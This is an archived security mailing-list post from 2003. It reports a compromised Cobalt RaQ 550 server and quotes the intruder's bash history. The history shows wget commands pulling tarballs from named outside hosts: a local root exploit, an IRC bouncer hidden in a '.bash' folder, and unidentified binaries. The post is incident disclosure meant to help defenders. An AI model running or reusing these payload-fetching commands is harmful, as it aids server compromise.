lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CD58EFC8-F866-11D7-9171-0003939CDB32@code511.com> From: adf at code511.com (adf--at--Code511.com) Subject: raq 550 compromised sorry for the "cross-post", I just saw this message on cobalt-security mailing list today: an user got his raq 550 compromised and he posted some bash history he found: -wget www.ps-lov.us/pizda.tgz :unknown binaries (yet?) named "mumu" -wget snow.prohosting.com/muiemuie/p.tar.gz :Linux kernel ptrace/kmod local root exploit from ipsec -wget snow.prohosting.com/muiemuie/p.tgz : it will decompress psybnc in a hidden folder (.bash) -wget snow.prohosting.com/muiemuie/km3.tgz ----->(file offline) -wget 65.113.119.133/muiemuie/km3.tgz ----->(file offline) anyone seen pizda or mumu ? if you interested in all details of the post: http://list.cobalt.com/pipermail/cobalt-security/2003-October/ 008607.html -deepquest